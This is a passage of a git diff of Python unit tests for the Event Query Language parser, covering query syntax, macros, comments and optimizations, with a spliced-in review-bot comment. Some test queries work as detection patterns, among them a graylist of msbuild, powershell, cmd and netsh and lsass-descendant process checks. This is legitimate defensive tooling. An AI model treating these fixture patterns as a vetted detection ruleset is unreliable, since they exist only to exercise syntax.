"extra"quote"', - 'file where and', - 'file where file_name and', - 'file_name and', - 'file_name )', - 'file_name (\r\n\r\n', - 'file_name where (\r\n\r\n)', - 'process where _badSymbol == 100', - 'process where 1field == 2field', - 'sequence where 1field == 2field', - 'process where true | filter', - 'process where true | badPipe', - 'process where true | badPipe a b c', - 'process where true | head -100', - 'process where descendant of []', - 'any where true | window | unique_count a, b', - 'any where true | window a | unique_count a, b', - 'file where nothing of [process where true]', - 'file where DescenDant of [process where true]', - 'garbage', - 'process where process_name == "abc.exe" | count 100', - 'process where process_name == "abc.exe" | unique 100', - 'process where process_name == "abc.exe" | sort 100', - 'process where process_name == "abc.exe" | head 100 abc', - 'process where process_name == "abc.exe" | head abc', - 'process where process_name == "abc.exe" | head abc()', - 'process where process_name == "abc.exe" | head abc(def, ghi)', - 'sequence [process where pid == pid]', - 'sequence [process where pid == pid] []', - 'sequence with maxspan=false [process where true] [process where true]', - 'sequence with badparam=100 [process where true] [process where true]', - # check that the same number of BYs are in every subquery - 'sequence [file where true] [process where true] by field1', - 'sequence [file where true] by field [file where true] by field1 until [file where true]', - 'sequence by a,b,c [file where true] by field [file where true] by field1 until [file where true]', - 'sequence [file where 1] by field [file where 1] by f1 until [file where 1] by f1,f2 | unique field', - 'sequence [process where 1] fork=true [network where 1]', - 'sequence [process where 1] [network where 1] badparam=true', - 'sequence [process where 1] [network where 1] fork=true fork=true', - 'sequence [process where 1] [network where 1] fork fork', - 'process where 
descendant of [file where true] bad=param', - '| filter true' - ] - for query in invalid: - self.assertRaises(ParseError, parse_query, query) - - macro_definitions = """ - macro A_OR_B(a,b) - a or b - - macro XOR(a,b) - A_OR_B(a and not b, b and not a) - - macro IN_GRAYLIST(proc) - proc in ( - "msbuild.exe", - "powershell.exe", - "cmd.exe", - "netsh.exe" - ) - - macro PROCESS_IN_GRAYLIST() - IN_GRAYLIST(process_name) - - macro PARENT_XOR_CHILD_IN_GRAYLIST() - XOR(IN_GRAYLIST(process_name), IN_GRAYLIST(parent_process_name)) - - macro DESCENDANT_OF_PROC(expr) - descendant of [process where opcode==1 and expr] - """ - - def test_macro_expansion(self): - """Test EQL custom macros.""" - expanded = { - "A_OR_B": "a or b", - "XOR": "(a and not b) or (b and not a)", - "IN_GRAYLIST": 'proc in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")', - "PROCESS_IN_GRAYLIST": 'process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")', - "PARENT_XOR_CHILD_IN_GRAYLIST": ( - '( ' - ' process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe") and not ' - ' parent_process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")' - ') or (' - ' parent_process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe") and not ' - ' process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")' - ')' - ), - 'DESCENDANT_OF_PROC': 'descendant of [process where opcode == 1 and expr]' - } - - macros = parse_definitions(self.macro_definitions) - lookup = OrderedDict() - - for macro in macros: - lookup[macro.name] = macro - rendered = macro.render() - macro_copy = parse_definition(rendered) - self.assertEqual(macro, macro_copy) - self.assertEqual(rendered, macro_copy.render(), "Macro doesn't render valid EQL.") - - # Now load up each macro to the engine - engine = PreProcessor(macros) - - # Confirm that nested macros are expanded appropriately - for name, macro in engine.macros.items(): - if name == 'safePath': - continue - 
expected_expr = parse_expression(expanded[name]) - self.assertEqual(macro.expression, expected_expr) - self.assertEqual(macro.expression.render(), expected_expr.render()) - - # Expand some EQL queries - queries = [ - ('process where DESCENDANT_OF_PROC(process_name="explorer.exe")', - 'process where descendant of [process where opcode=1 and process_name == "explorer.exe"]' - ), - ('process where XOR(a=="b", c=="d")', - 'process where ((a == "b") and not (c == "d")) or ((c == "d") and not (a == "b"))' - ), - ('file where true', - 'file where true', - ), - ('process where opcode=1 and PROCESS_IN_GRAYLIST()', - 'process where opcode==1 and process_name in ("msbuild.exe","powershell.exe","cmd.exe","netsh.exe")' - ), - ] - - for query, expanded_query in queries: - before_node = parse_query(query) - actual = engine.expand(before_node) - expected = parse_query(expanded_query) - - # Test that eval + repr works - actual_repr = repr(actual) - eval_actual = eval(actual_repr) - - self.assertEqual(actual, expected) - self.assertEqual(eval_actual, actual) - self.assertTrue(actual == expected) - self.assertFalse(actual != expected) - error_msg = "'{}' expanded to '{}' instead of '{}'".format(query, actual.render(), expected.render()) - self.assertEqual(actual.render(), expected.render(), error_msg) - - query = parse_expression("DESCENDANT_OF_PROC()") - self.assertRaisesRegexp(ValueError, "Macro .+ expected \d+ arguments .*", engine.expand, query) - - query = parse_expression("DESCENDANT_OF_PROC(1,2,3)") - self.assertRaisesRegexp(ValueError, "Macro .+ expected \d+ arguments .*", engine.expand, query) - - def test_engine_schema(self): - """Test loading the engine with a custom schema.""" - queries = [ - 'movie where name == "*Breakfast*" and IN_80s(release)', - 'person where name == "John Hughes"', - ] - - analytic_dicts = [{'query': q} for q in queries] - definitions = """ - macro IN_80s(date) date == "*/*/1980" - """ - - config = { - 'schema': {'event_types': {'movie': 1, 
'person': 2}}, - 'definitions': parse_definitions(definitions), - 'analytics': analytic_dicts - } - - pp = PreProcessor() - pp.add_definitions(config['definitions']) - - with use_schema(config['schema']): - expected = [parse_analytic(d, preprocessor=pp) for d in analytic_dicts] - - engine = BaseEngine(config) - with use_schema(engine.schema): - engine.add_analytics([parse_analytic(d) for d in analytic_dicts]) - - self.assertListEqual(engine.analytics, expected, "Analytics were not loaded and expanded properly.") - - def test_custom_macro(self): - """Test python custom macro expansion.""" - def optimize_length(args, walker): - arg, = args # only 1 allowed - if isinstance(arg, String): - return Number(len(arg.value)) - else: - return FunctionCall('length', [arg]) - - macro = CustomMacro('LENGTH', optimize_length) - engine = PreProcessor([macro]) - - example = parse_query('process where LENGTH("python.exe") == LENGTH(process_name)') - expected = parse_query('process where 10 == length(process_name)') - - output = engine.expand(example) - self.assertEqual(output, expected, "Custom macro LENGTH was not properly expanded") - - example = parse_query('process where LENGTH("abc", "def")') - self.assertRaisesRegexp(ValueError, "too many values to unpack", engine.expand, example) - - def test_load_definitions_from_file(self): - """Test loading definitions from a file.""" - filename = 'example-definitions.eql.tmp' - config = {'definitions_files': [filename]} - with open(filename, 'w') as f: - f.write(self.macro_definitions) - engine = TextEngine(config) - os.remove(filename) - self.assertGreater(len(engine.preprocessor.macros), 0, "Definitions failed to load") - - def test_mixed_definitions(self): - """Test that macro and constant definitions can be loaded correctly.""" - defn = parse_definitions(""" - const magic = 100 - macro OR(a, b) a or b - """) - pp = PreProcessor(defn) - - # Confirm that copy and adding is working - pp2 = pp.copy() - 
pp.add_definition(parse_definition("macro ABC(a, b, c) error_error_error")) - pp2.add_definition(parse_definition("macro ABC(a, b, c) f(a, magic, c)")) - - matches = [ - ("abc", "abc"), - ("OR(x, y)", "x or y"), - ("magic", "100"), - ("ABC(0,1,2)", "f(0, 100, 2)"), - ] - for before, after in matches: - before = parse_expression(before) - after = parse_expression(after) - self.assertEqual(pp2.expand(before), after) - - def test_static_value_optimizations(self): - """Test parser optimizations for comparing static values.""" - expected_true = [ - '10 == 10', - '10 == 10.0', - '"abc" == "abc"', - 'true == true', - 'true != false', - 'true != 100', - '100 != "abc"', - '"" == ""', - '"" == "*"', - '"aaaaa" == "*"', - '100 != "*abcdef*"', - '"abc" == "*abc*"', - '"abc" == "*ABC*"', - '"ABC" == "*abc*"', - '"abc" != "d*"', - '"net view" == "net* view*"', - '"net view" == "net* view"', - '"net view view" == "net* view"', - '"net view " == "net* VIEW*"', - '"Net!!! VIEW view net view" == "net* view*"', - 'not "Net!!! VIEW view net view" != "net* view*"', - '"Newww!!! 
VIEW view net view" != "net* view*"', - '1 < 2', - '1 <= 2', - '2 <= 2', - '1 <= 1.0', - '1.0 <= 1', - '2 > 1', - '2 >= 1', - '2 >= 2', - '2 != 1', - '"ABC" <= "ABC"', - "length('abcdefg') == 7", - "100 in (1, 2, 3, 4, 100, 105)", - "'rundll' in (1, 2, 3, abc.def[100], 'RUNDLL', false)", - "not 'rundll' in (1, 2, 3, '100', 'nothing', false)", - ] - - for expression in expected_true: - ast = parse_expression(expression) - self.assertIsInstance(ast, Boolean, 'Failed to optimize {}'.format(expression)) - self.assertTrue(ast.value, 'Parser did not evaluate {} as true'.format(expression)) - - expected_false = [ - '100 = "a"', - '"b" == "a"', - '1 == 2', - '1 > 2', - '5 <= -3', - '"ABC" = "abcd"', - '"ABC*DEF" == " ABC DEF "', - '1 == "*"', - '"abc" > "def"', - '"abc" != "abc"', - ] - - for expression in expected_false: - ast = parse_expression(expression) - self.assertIsInstance(ast, Boolean, 'Failed to optimize {}'.format(expression)) - self.assertFalse(ast.value, 'Parser did not evaluate {} as false'.format(expression)) - - expression = '"something" in ("str", "str2", "str3", "str4", someField)' - optimized = '"something" == someField' - self.assertEqual(parse_expression(expression), parse_expression(optimized)) - - expression = '"something" in ("str", "str2", "str3", "str4", field1, field2)' - optimized = '"something" in (field1, field2)' - self.assertEqual(parse_expression(expression), parse_expression(optimized)) - - def test_query_events(self): - """Test that event queries work with events[n].* syntax in pipes.""" - base_queries = ['abc', 'abc[123]', 'abc.def.ghi', 'abc.def[123].ghi[456]'] - for text in base_queries: - field_query = parse_expression(text) # type: Field - events_query = parse_expression('events[0].' 
+ text) # type: Field - - index, query = field_query.query_multiple_events() - self.assertEqual(index, 0, "Didn't query from first event") - self.assertEqual(query, field_query, "Didn't unconvert query") - - index, query = events_query.query_multiple_events() - self.assertEqual(index, 0, "Didn't query from first event") - self.assertEqual(query, field_query, "Didn't unconvert query") - - for event_index, text in enumerate(base_queries): - events_text = 'events[{}].{}'.format(event_index, text) - field_query = parse_expression(text) # type: Field - events_query = parse_expression(events_text) # type: Field - index, query = events_query.query_multiple_events() - self.assertEqual(index, event_index, "Didn't query from {} event".format(event_index)) - self.assertEqual(query, field_query, "Didn't unconvert query") - - def test_parse_with_preprocessor(self): - """Test that preprocessor works with the parser.""" - preprocessor = get_preprocessor(""" - const ABC = 123 - const DEF = 456 - const GHI = 123 - - macro COMPARE_TWO(a, b) a == b - macro GET_TRUE(a) COMPARE_TWO(a, a) - """) - - def p(text): - return parse_expression(text, preprocessor=preprocessor) - - self.assertEqual(p('ABC'), Number(123)) - self.assertEqual(p('COMPARE_TWO(some_field, "abc.exe")'), p('some_field == "abc.exe"')) - self.assertEqual(p('COMPARE_TWO(105, 105)'), Boolean(True)) - self.assertEqual(p('GET_TRUE(100)'), Boolean(True)) - - # now double up - double_pp = get_preprocessor(""" - macro TRUE() GET_TRUE(105) - macro FALSE() not TRUE() - """, preprocessor=preprocessor) - - def pp(text): - return parse_expression(text, preprocessor=double_pp) - - self.assertEqual(pp('ABC'), Number(123)) - self.assertEqual(pp('TRUE()'), Boolean(True)) - self.assertEqual(pp('FALSE()'), Boolean(False)) - self.assertEqual(pp('not FALSE()'), Boolean(True)) - - def test_set_optimizations(self): - """Test that set unions, intersections, etc. 
are correct.""" - duplicate_values = parse_expression('fieldname in ("a", "b", "C", "d", 1, "d", "D", "c")') - no_duplicates = parse_expression('fieldname in ("a", "b", "C", "d", 1)') - self.assertEqual(duplicate_values, no_duplicates, "duplicate values were not removed") - - two_sets = parse_expression('fieldname in ("a", "b", "C", "x") and fieldname in ("d", "c", "g", "X")') - intersection = parse_expression('fieldname in ("C", "x")') - self.assertEqual(two_sets, intersection, "intersection test failed") - - two_sets = parse_expression('(fieldname in ("a", "b", "C", "x")) and fieldname in ("d", "f", "g", 123)') - self.assertEqual(two_sets, Boolean(False), "empty intersection test failed") - - two_sets = parse_expression('fieldname in ("a", "b", "C", "x") or fieldname in ("d", "c", "g", "X")') - union = parse_expression('fieldname in ("a", "b", "C", "x", "d", "g")') - self.assertEqual(two_sets, union, "union test failed") - - literal_check = parse_expression('"ABC" in ("a", "ABC", "C")') - self.assertEqual(literal_check, Boolean(True), "literal comparison failed") - - literal_check = parse_expression('"def" in ("a", "ABC", "C")') - self.assertEqual(literal_check, Boolean(False), "literal comparison failed") - - dynamic_values = parse_expression('"abc" in ("a", "b", fieldA, "C", "d", fieldB, fieldC)') - no_duplicates = parse_expression('"abc" in (fieldA, fieldB, fieldC)') - self.assertEqual(dynamic_values, no_duplicates, "literal values were not removed") - - dynamic_values = parse_expression('fieldA in ("a", "b", "C", "d", fieldA, fieldB, fieldC)') - self.assertEqual(dynamic_values, Boolean(True), "dynamic set lookup not optimized") - - def test_comments(self): - """Test that comments are valid syntax but stripped from AST.""" - match = parse_query("process where pid=4 and ppid=0") - - query = parse_query("""process where pid = 4 /* multi\nline\ncomment */ and ppid=0""") - self.assertEqual(match, query) - - query = parse_query("""process where pid = 4 // something 
\n and ppid=0""") - self.assertEqual(match, query) - - query = parse_query("""process where pid - = 4 and ppid=0 - """) - self.assertEqual(match, query) - - query = parse_query("""process where - // test - // - //line - //comments - pid = 4 and ppid = 0 - """) - self.assertEqual(match, query) - - match = parse_expression("true") - query = parse_expression("true // something else \r\n /* test\r\n something \r\n*/") - self.assertEqual(match, query) - - commented = parse_definitions("macro test() pid = 4 and /* comment */ ppid = 0") - macro = parse_definitions("macro test() pid = 4 and ppid = 0") - self.assertEqual(commented, macro) - - def test_invalid_comments(self): - """Test that invalid/overlapping comments fail.""" - query_text = "process where /* something */ else */ true" - self.assertRaises(ParseError, parse_query, query_text) - - # Test nested comments (not supported) - query_text = "process where /* outer /* nested */ outer */ true" - self.assertRaises(ParseError, parse_query, query_text) - - query_text = "process where // true" - self.assertRaises(ParseError, parse_query, query_text) diff --git a/tests/test_optimizations.py b/tests/test_optimizations.py new file mode 100644 index 0000000..67172b4 --- /dev/null +++ b/tests/test_optimizations.py 
@@ -0,0 +1,168 @@ +"""Tests for optimization of syntax trees.""" +import unittest + +from eql.ast import * # noqa: F403 +from eql.parser import parse_expression + + +class TestParseOptimizations(unittest.TestCase): + """Tests that the parser returns optimized syntax trees.""" + + def test_set_static_optimizations(self): + """Check that checks for static fields in sets return optimized ASTs.""" + expression = '"something" in ("str", "str2", "str3", "str4", someField)' + optimized = '"something" == someField' + self.assertEqual(parse_expression(expression), parse_expression(optimized)) + + expression = '"something" in ("str", "str2", "str3", "str4", field1, field2)' + optimized = '"something" in (field1, field2)' + self.assertEqual(parse_expression(expression), parse_expression(optimized)) + + def test_set_optimizations(self): + """Test that set unions, intersections, etc. are correct.""" + duplicate_values = parse_expression('fieldname in ("a", "b", "C", "d", 1, "d", "D", "c")') + no_duplicates = parse_expression('fieldname in ("a", "b", "C", "d", 1)') + self.assertEqual(duplicate_values, no_duplicates, "duplicate values were not removed") + + two_sets = parse_expression('fieldname in ("a", "b", "C", "x") and fieldname in ("d", "c", "g", "X")') + intersection = parse_expression('fieldname in ("C", "x")') + self.assertEqual(two_sets, intersection, "intersection test failed") + + two_sets = parse_expression('(fieldname in ("a", "b", "C", "x")) and fieldname in ("d", "f", "g", 123)') + self.assertEqual(two_sets, Boolean(False), "empty intersection test failed") + + two_sets = parse_expression('fieldname in ("a", "b", "C", "x") or fieldname in ("d", "c", "g", "X")') + union = parse_expression('fieldname in ("a", "b", "C", "x", "d", "g")') + self.assertEqual(two_sets, union, "union test failed") + + literal_check = parse_expression('"ABC" in ("a", "ABC", "C")') + self.assertEqual(literal_check, Boolean(True), "literal comparison failed") + + literal_check = 
parse_expression('"def" in ("a", "ABC", "C")') + self.assertEqual(literal_check, Boolean(False), "literal comparison failed") + + dynamic_values = parse_expression('"abc" in ("a", "b", fieldA, "C", "d", fieldB, fieldC)') + no_duplicates = parse_expression('"abc" in (fieldA, fieldB, fieldC)') + self.assertEqual(dynamic_values, no_duplicates, "literal values were not removed") + + dynamic_values = parse_expression('fieldA in ("a", "b", "C", "d", fieldA, fieldB, fieldC)') + self.assertEqual(dynamic_values, Boolean(True), "dynamic set lookup not optimized") + + and_not = parse_expression('NAME in ("a", "b", "c", "d") and not NAME in ("b", "d")') + subtracted = parse_expression('NAME in ("a", "c")') + self.assertEqual(and_not, subtracted, "set subtraction failed") + + def test_compound_merging_sets(self): + """Test that compound boolean terms are merged correctly.""" + mixed_sets = parse_expression('opcode=1 and name in ("a", "b", "c", "d") and name in ("b", "d")') + optimized = parse_expression('opcode=1 and name in ("b", "d")') + self.assertEqual(mixed_sets, optimized, "failed to merge at tail of AND") + + mixed_sets = parse_expression('opcode=1 and name in ("a", "b", "c", "d") and name in ("b", "d") and x=1') + optimized = parse_expression('opcode=1 and name in ("b", "d") and x=1') + self.assertEqual(mixed_sets, optimized, "failed to merge at middle of AND") + + mixed_sets = parse_expression('opcode=1 or name in ("a", "b", "c", "d") or name in ("e", "f")') + optimized = parse_expression('opcode=1 or name in ("a", "b", "c", "d", "e", "f")') + self.assertEqual(mixed_sets, optimized, "failed to merge at tail of OR") + + mixed_sets = parse_expression('opcode=1 or name in ("a", "b", "c", "d") or name in ("e", "f") or x=1') + optimized = parse_expression('opcode=1 or name in ("a", "b", "c", "d", "e", "f") or x=1') + self.assertEqual(mixed_sets, optimized, "failed to merge at middle of OR") + + def test_comparisons_to_sets(self): + """Test that multiple comparisons become 
sets.""" + multi_compare = parse_expression('pid == 4 or pid == 8 or pid == 520') + optimized = parse_expression("pid in (4, 8, 520)") + self.assertEqual(multi_compare, optimized, "Failed to merge comparisons into a set") + + def test_set_comparison_optimizations(self): + """Test that sets and comparisons are merged.""" + set_or_comp = parse_expression('name in ("a", "b") or name == "c"') + optimized = parse_expression('name in ("a", "b", "c")') + self.assertEqual(set_or_comp, optimized, "Failed to OR a set with matching comparison") + + set_and_comp = parse_expression('name in ("a", "b") and name == "c"') + optimized = parse_expression('false') + self.assertEqual(set_and_comp, optimized, "Failed to AND a set with matching missing comparison") + + set_and_comp = parse_expression('name in ("a", "b") and name == "b"') + optimized = parse_expression('name == "b"') + self.assertEqual(set_and_comp, optimized, "Failed to AND a set with matching comparison") + + # switch the order + comp_or_set = parse_expression('name == "c" or name in ("a", "b")') + optimized = parse_expression('name in ("c", "a", "b")') + self.assertEqual(comp_or_set, optimized, "Failed to OR a comparison with a matching set") + + comp_and_set = parse_expression('name == "c" and name in ("a", "b")') + optimized = parse_expression('false') + self.assertEqual(comp_and_set, optimized, "Failed to AND a comparison with a matching missing set") + + comp_and_set = parse_expression('name == "b" and name in ("a", "b")') + optimized = parse_expression('name == "b"') + self.assertEqual(comp_and_set, optimized, "Failed to AND a comparisong with a matching set") + + # test that values can be subtracted individually from sets + set_and_not = parse_expression('name in ("a", "b", "c") and name != "c"') + optimized = parse_expression('name in ("a", "b")') + self.assertEqual(set_and_not, optimized, "Failed to subtract specific value from set") + + def test_static_value_optimizations(self): + """Test parser optimizations 
for comparing static values.""" + expected_true = [ + '10 == 10', + '10 == 10.0', + '"abc" == "abc"', + 'true == true', + 'true != false', + '"" == ""', + '"" == "*"', + '"aaaaa" == "*"', + '"abc" == "*abc*"', + '"abc" == "*ABC*"', + '"ABC" == "*abc*"', + '"abc" != "d*"', + '"net view" == "net* view*"', + '"net view" == "net* view"', + '"net view view" == "net* view"', + '"net view " == "net* VIEW*"', + '"Net!!! VIEW view net view" == "net* view*"', + 'not "Net!!! VIEW view net view" != "net* view*"', + '"Newww!!! VIEW view net view" != "net* view*"', + '1 < 2', + '1 <= 2', + '2 <= 2', + '1 <= 1.0', + '1.0 <= 1', + '2 > 1', + '2 >= 1', + '2 >= 2', + '2 != 1', + '"ABC" <= "ABC"', + "length('abcdefg') == 7", + "100 in (1, 2, 3, 4, 100, 105)", + "'rundll' in (abc.def[100], 'RUNDLL')", + "not 'rundll' in ('100', 'nothing')", + ] + + expected_false = [ + '"b" == "a"', + '1 == 2', + '1 > 2', + '5 <= -3', + '"ABC" = "abcd"', + '"ABC*DEF" == " ABC DEF "', + '"abc" > "def"', + '"abc" != "abc"', + ] + + for expression in expected_true: + ast = parse_expression(expression) + self.assertIsInstance(ast, Boolean, 'Failed to optimize {}'.format(expression)) + self.assertTrue(ast.value, 'Parser did not evaluate {} as true'.format(expression)) + + for expression in expected_false: + ast = parse_expression(expression) + self.assertIsInstance(ast, Boolean, 'Failed to optimize {}'.format(expression)) + self.assertFalse(ast.value, 'Parser did not evaluate {} as false'.format(expression)) diff --git a/tests/test_parser.py b/tests/test_parser.py new file mode 100644 index 0000000..267eff9 --- /dev/null +++ b/tests/test_parser.py 
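Review bot: The assertion message in test_set_comparison_optimizations, `"Failed to AND a comparisong with a matching set"`, carries a typo ("comparisong") that will be printed verbatim on failure; `"Failed to AND a comparison with a matching set"` is the intended text. Separately, `from eql.ast import *  # noqa: F403` pulls in the whole AST namespace while `Boolean` is the only name this file references, so `from eql.ast import Boolean` would make the dependency explicit and let pyflakes check name resolution instead of being silenced. test_static_value_optimizations also has no negative control: an expression that must not fold, such as `'someField == 10'` asserted not to be an instance of `Boolean`, would catch an optimizer that constant-folds too eagerly.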
@@ -0,0 +1,364 @@ +"""Test case.""" +import datetime +import sys +import traceback +import unittest +from collections import OrderedDict # noqa: F403 + +from eql.ast import * # noqa: F403 +from eql.errors import EqlSyntaxError, EqlSemanticError, EqlParseError +from eql.parser import ( + parse_query, parse_expression, parse_definitions, ignore_missing_functions, parse_field, parse_literal +) +from eql.pipes import * # noqa: F403 + + +class TestParser(unittest.TestCase): + """Test EQL parsing.""" + + def test_valid_expressions(self): + """Test that expressions are parsed correctly.""" + valid = [ + "1 == 1", + "false != (1 == 1)", + 'abc != "ghi"', + "abc > 20", + "startsWith(abc, 'abc')", + "concat(a,b,c,d,)", + "a in (1,2,3,4,)", + "length(abc) < length(hij)", + "length(concat(abc))", + 'abc == substring("abc", 1, 3)', + "1", + '(1)', + "true", + "false", + "null", + "not null", + "abc", + '"string"', + 'abc and def', + '(1==abc) and def', + 'abc == (1 and 2)', + 'abc == (def and 2)', + 'abc == (def and def)', + 'abc == (def and ghi)', + '"\\b\\t\\r\\n\\f\\\\\\"\\\'"', + ] + + for query in valid: + parse_expression(query) + + def test_parse_field(self): + """Test that fields are parsed correctly.""" + self.assertEquals(parse_field("process_name "), Field("process_name")) + self.assertEquals(parse_field("TRUE "), Field("TRUE")) + self.assertEquals(parse_field(" data[0]"), Field("data", [0])) + self.assertEquals(parse_field("data[0].nested.name"), Field("data", [0, "nested", "name"])) + + self.assertRaises(EqlParseError, parse_field, " ") + self.assertRaises(EqlParseError, parse_field, "100.5") + self.assertRaises(EqlParseError, parse_field, "true") + self.assertRaises(EqlParseError, parse_field, "and") + self.assertRaises(EqlParseError, parse_field, "length(name) and path") + + def test_parse_literal(self): + """Test that fields are parsed correctly.""" + self.assertEquals(parse_literal("true"), Boolean(True)) + self.assertEquals(parse_literal("null"), Null()) + 
self.assertEquals(parse_literal(" 100.5 "), Number(100.5)) + self.assertEquals(parse_literal("true"), Boolean(True)) + self.assertEquals(parse_literal("'C:\\\\windows\\\\system32\\\\cmd.exe'"), + String("C:\\windows\\system32\\cmd.exe")) + + self.assertRaises(EqlParseError, parse_field, "and") + self.assertRaises(EqlParseError, parse_literal, "process_name") + self.assertRaises(EqlParseError, parse_literal, "length('abc')") + self.assertRaises(EqlParseError, parse_literal, "True") + + def test_functions(self): + """Test that functions are being parsed correctly.""" + # Make sure that functions are parsing all arguments + with ignore_missing_functions: + fn = parse_expression('somefunction( a and c, false, d or g) ') + self.assertIsInstance(fn, FunctionCall) + self.assertEqual(len(fn.arguments), 3) + + def test_invalid_expressions(self): + """Test that expressions are parsed correctly.""" + invalid = [ + '', # empty + 'a xor b', # made up comparator + 'a ^ b', # made up comparator + 'a % "b"', # made up comparator + 'a b c d', # missing syntax + 'def[]', # no index + 'def[ghi]', # index not a number + 'def[-1]', # negative indexes not supported + 'someFunc().abc', # invalid function + 'length().abc', # can't index these + '1.2.3', # invalid number + 'a.1', + '(field', # unclosed paren + '(field xx', # unclosed paren and bad syntax + 'field[', # unclosed bracket + 'field[0', # unclosed bracket + '(', + ')', + '()', # nothing inside + '', + '"invalid"string"', + 'descendant of [event_type where true', + '--100', + '1000 100', + '"" 100', + # literal values as fields and functions + 'true.100', + 'true()', + 'null.abc', + 'abc[0].null', + # require escape slashes, + '\\R', + '\\W', + # minimum of 1 argument + 'length()', + 'concat()', + ] + + keywords = [ + 'and', 'by', 'in', 'join', 'macro', 'not', 'of', 'or', 'sequence', 'until', 'where', 'with' + ] + + for query in invalid: + self.assertRaises(EqlParseError, parse_expression, query) + + for keyword in keywords: + 
self.assertRaises(EqlSyntaxError, parse_expression, keyword) + parse_expression(keyword.upper()) + + def test_valid_queries(self): + """Make sure that EQL queries are properly parsed.""" + valid = [ + 'file where true', + 'file where true and true', + 'file where false or true', + 'registry where not pid', + 'process where process_name == "net.exe" and command_line == "* user*.exe"', + 'process where command_line == "~!@#$%^&*();\'[]{}\\\\|<>?,./:\\"-= \' "', + 'process where \n\n\npid ==\t 4', + 'process where process_name in ("net.exe", "cmd.exe", "at.exe")', + 'process where command_line == "*.exe *admin*" or command_line == "* a b*"', + 'process where pid in (1,2,3,4,5,6,7,8) and abc == 100 and def == 200 and ghi == 300 and jkl == x', + 'process where ppid != pid', + 'image_load where not x != y', + 'image_load where not x == y', + 'image_load where not not not not x < y', + 'image_load where not x <= y', + 'image_load where not x >= y', + 'image_load where not x > y', + 'process where pid == 4 or pid == 5 or pid == 6 or pid == 7 or pid == 8', + 'network where pid == 0 or pid == 4 or (ppid == 0 or ppid = 4) or (abc == defgh) and process_name == "*" ', + 'network where pid = 4', + 'process where descendant of [process where process_name == "lsass.exe"] and process_name == "cmd.exe"', + 'join \t\t\t[process where process_name == "*"] [ file where file_path == "*"\n]', + 'join by pid [process where name == "*"] [file where path == "*"] until [process where opcode == 2]', + 'sequence [process where name == "*"] [file where path == "*"] until [process where opcode == 2]', + 'sequence by pid [process where name == "*"] [file where path == "*"] until [process where opcode == 2]', + 'join [process where process_name == "*"] by process_path [file where file_path == "*"] by image_path', + 'sequence [process where process_name == "*"] by process_path [file where file_path == "*"] by image_path', + 'sequence by pid [process where process_name == "*"] [file where file_path 
== "*"]', + 'sequence by pid with maxspan=200 [process where process_name == "*" ] [file where file_path == "*"]', + 'sequence by pid with maxspan=2s [process where process_name == "*" ] [file where file_path == "*"]', + 'sequence by pid with maxspan=2sec [process where process_name == "*" ] [file where file_path == "*"]', + 'sequence by pid with maxspan=2seconds [process where process_name == "*" ] [file where file_path == "*"]', + 'sequence with maxspan=2.5m [process where x == x] by pid [file where file_path == "*"] by ppid', + 'sequence by pid with maxspan=2.0h [process where process_name == "*"] [file where file_path == "*"]', + 'sequence by pid with maxspan=2.0h [process where process_name == "*"] [file where file_path == "*"]', + 'sequence by pid with maxspan=1.0075d [process where process_name == "*"] [file where file_path == "*"]', + 'dns where pid == 100 | head 100 | tail 50 | unique pid', + 'network where pid == 100 | unique command_line | count', + 'security where user_domain == "endgame" | count user_name a b | tail 5', + 'process where 1==1 | count user_name, unique_pid, concat(field2,a,bc)', + 'process where 1==1 | unique user_name, concat(field2,a,bc), field2', + 'registry where a.b', + 'registry where a[0]', + 'registry where a.b.c.d.e', + 'registry where a.b.c[0]', + 'registry where a[0].b', + 'registry where a[0][1].b', + 'registry where a[0].b[1]', + 'registry where topField.subField[100].subsubField == 0', + 'process where true | filter true', + 'process where 1==1 | filter abc == def', + 'process where 1==1 | filter abc == def and 1 != 2', + 'process where 1==1 | count process_name | filter percent > 0.5', + 'process where a > 100000000000000000000000000000000', + 'any where true | unique a b c | sort a b c | count', + 'any where true | unique a, b, c | sort a b c | count', + 'any where true | unique a, b, c | sort a,b,c | count', + 'any where true | window 5s | unique a, b | unique_count a | filter count > 5', + 'file where child of [registry 
where true]', + 'file where event of [registry where true]', + 'file where event of [registry where true]', + 'file where descendant of [registry where true]', + # multiple by values + 'sequence by field1 [file where true] by f1 [process where true] by f1', + 'sequence by a,b,c,d [file where true] by f1,f2 [process where true] by f1,f2', + 'sequence [file where 1] by f1,f2 [process where 1] by f1,f2 until [process where 1] by f1,f2', + 'sequence by f [file where true] by a,b [process where true] by c,d until [process where 1] by e,f', + # sequence with named params + 'sequence by unique_pid [process where true] [file where true] fork', + 'sequence by unique_pid [process where true] [file where true] fork=true', + 'sequence by unique_pid [process where true] [file where true] fork=1', + 'sequence by unique_pid [process where true] [file where true] fork=false', + 'sequence by unique_pid [process where true] [file where true] fork=0 [network where true]', + 'sequence by unique_pid [process where true] [file where true] fork=0', + ] + + datetime.datetime.now() + + for i, text in enumerate(valid): + try: + query = parse_query(text) + rendered = query.render() + self.assertEqual(text.split()[0], rendered.split()[0]) + + # parse it again to make sure it's still valid and doesn't change + parse_again = parse_query(rendered) + rendered_again = parse_again.render() + + # repr + eval should also restore it properly + # Test that eval + repr works + actual_repr = repr(query) + eval_actual = eval(actual_repr) + + self.assertEqual(query, parse_again, "Query didn't reparse correctly.") + self.assertEqual(rendered, rendered_again) + self.assertEqual(query, eval_actual) + + except (EqlSyntaxError, EqlSemanticError): + ex_type, ex, tb = sys.exc_info() + traceback.print_exc(ex) + traceback.print_tb(tb) + self.fail("Unable to parse query #{}: {}".format(i, text)) + + def test_invalid_queries(self): + """Test that invalid queries throw the proper error.""" + invalid = [ + '', # empty 
